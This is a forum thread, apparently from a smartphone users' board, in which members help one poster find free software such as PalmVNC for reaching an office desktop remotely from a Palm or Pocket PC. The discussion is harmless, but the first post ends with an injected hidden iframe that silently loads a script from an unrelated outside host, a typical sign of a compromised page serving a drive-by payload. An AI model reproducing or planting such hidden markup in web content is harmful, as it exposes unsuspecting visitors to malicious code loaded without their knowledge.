+ Reply to Thread

remote connection to desktop...

A week or so ago, I remember reading a post regarding a free piece of software to download that would allow me to remotely connect to my office desktop. I can't find the post and was hoping someone remembers and can reply. I meant to bookmark the url but bitten by the procrastinator.

Thanks in advance...<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: remote connection to desktop...

Originally posted by palmtreepromos
    A week or so ago, I remember reading a post regarding a free piece of software to download that would allow me to remotely connect to my office desktop. I can't find the post and was hoping someone remembers and can reply. I meant to bookmark the url but bitten by the procrastinator.

Thanks in advance...
    Try this link...

http://www.smartphonesource.com/vbul...&highlight=vnc

that one is pretty cool, but not the info I was looking for. I seem to remember it was a piece of freeware made available from some university. Thanks for the effort in helping.

Administrator
    do you VNC or sprints business connect by any chance?

PPC6800 OWNER (ALLTEL SERVICE) GREGHARKINS's Avatar

network connection

are u wanting to hotsync or what is your application for connection to network?
    GREG HARKINS
    GREGHARKINS@BRINGINGFUNTOYOU.COM
    www.bringingfuntoyou.com

No I don't VNC or use sprint business connect. I am not wanting to hotsync. What I am looking for is the application that would act like www.gotomypc.com (which by the way is an incredible way to remotely connect through the internet to my office when I am on the road. If you have not taken a look at it, do yourself a favor, it rocks!). Unfortunately they don't support ppc or palm.

Anyway, I thought I saw a post here a week or so ago with a link to a website that had this type of connection for a pda or smartphone. I am not talking about 01 Communique Laboratory Inc.'s I'm In Touch ( www.01com.com ) program. This one is way to hard to get setup through firewalls.

Maybe I saw it on another board, but I could swear I saw it here.

I found the post and for those interested the website link in the post is http://www.btinternet.com/~harakan/PalmVNC/

Sorry for the goose chase...

Go Niners!

PPC6800 OWNER (ALLTEL SERVICE) GREGHARKINS's Avatar

desktop connection

Let us know how it works? This looks very interesting....
    It states it works with upto 3.### what about 4.0 and up?

I use pcanywhere now for my laptop to connect but i like the thought of being able to connect with my palm....

Keep us posted.
    GREG HARKINS
    GREGHARKINS@BRINGINGFUNTOYOU.COM
    www.bringingfuntoyou.com

I tried using this (palmvnc) to connect to my Mac at home, using the Mac destop software (posted in a previous link somewhere), but couldn't get it to connect. Anyone out there have success using PalmVNC with a Mac? If so, could you let me know the exact Mac desktop program that works? Thanks-

VNC Info

I had posted some backround info about VNC here:

http://www.smartphonesource.com/vbul...=vnc#post41864

As mentioned in the above post, the cool thing(s) about VNC are the price and that it is cross platform.

pdadoc - I have never tried using the palmvnc client to connect to a mac running vnc server, but I see know reason why it wouldn't work. We use vnc viewers from various platforms (pc and mac) to connect to vnc servers running on various platforms (pc, mac, and unix) frequently. If you have a firewall, be sure to open the port numbers I mentioned in linked post. Also, you might try to the browser interface from a computer outside of your LAN as a testing point.

If you are still having problems, I could test by trying to connect to a Mac from my palm when I return to work next week.

t